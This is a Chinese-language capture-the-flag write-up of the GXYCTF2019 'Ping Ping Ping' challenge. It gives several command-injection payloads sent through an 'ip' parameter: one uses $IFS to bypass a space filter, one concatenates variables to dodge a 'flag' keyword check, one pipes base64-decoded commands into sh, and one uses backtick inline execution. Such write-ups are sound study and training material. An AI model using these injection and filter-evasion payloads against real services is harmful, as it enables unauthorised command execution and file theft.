[GXYCTF2019]Ping Ping Ping

进入题目

image 71 - [GXYCTF2019]Ping Ping Ping

查看目录下的文件

image 72 - [GXYCTF2019]Ping Ping Ping

查看flag.php

image 73 - [GXYCTF2019]Ping Ping Ping

根据回显 发现空格被过滤了

使用$IFS$9绕过

image 74 - [GXYCTF2019]Ping Ping Ping

flag被绕过了 先查看index.php

image 76 - [GXYCTF2019]Ping Ping Ping

如果在传入的内容中'a','f','g','l'这四个字符按照 flag的顺序出现 就会被匹配到输出fxck your flag

构造拼接

?ip=127.0.0.01;a=ag.php;b=fl;cat$IFS$9$b$a
image 77 - [GXYCTF2019]Ping Ping Ping

从网上了解的另外一种解法 通过base64解密查看flag

payload

?ip=127.0.0.01;echo$IFS$1Y2F0JElGUyQ5ZmxhZy5waHA=|base64$IFS$1-d|sh
image 79 - [GXYCTF2019]Ping Ping Ping
image 78 - [GXYCTF2019]Ping Ping Ping

内联执行:将反引号内命令的输出作为输入执行

payload

?ip=127.0.0.01;cat$IFS$1`ls`
image 80 - [GXYCTF2019]Ping Ping Ping

[极客大挑战 2019]Secret File

上一篇

[极客大挑战 2019]Knife

下一篇
评论
发表评论 说点什么
还没有评论
34